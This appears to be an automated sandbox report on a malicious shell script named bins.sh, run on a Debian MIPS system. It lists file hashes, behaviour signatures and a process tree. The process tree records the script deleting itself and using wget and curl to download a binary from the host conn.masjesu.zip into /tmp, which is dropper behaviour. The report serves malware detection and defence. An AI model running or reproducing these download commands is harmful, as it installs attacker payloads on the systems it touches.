Analysis

  • max time kernel
    149s
  • max time network
    9s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags
    arch:mipsel
    image:debian9-mipsel-20240226-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    05/12/2024, 07:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    4ec351f49dc5766e37b9f2ca107ea79f

  • SHA1

    1e9e758cc6d6441d23748b0a346dcfc1df30e105

  • SHA256

    c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661

  • SHA512

    5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c

  • SSDEEP

    192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm

Score
3/10

Malware Config

Signatures

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    PID:696
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:699
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:702
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      PID:720

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

    Filesize

    177KB

    MD5

    786d75a158fe731feca3880f436082c0

    SHA1

    79ea2734e43d00cdeabed5586b2c1994d02aef3e

    SHA256

    5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

    SHA512

    7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f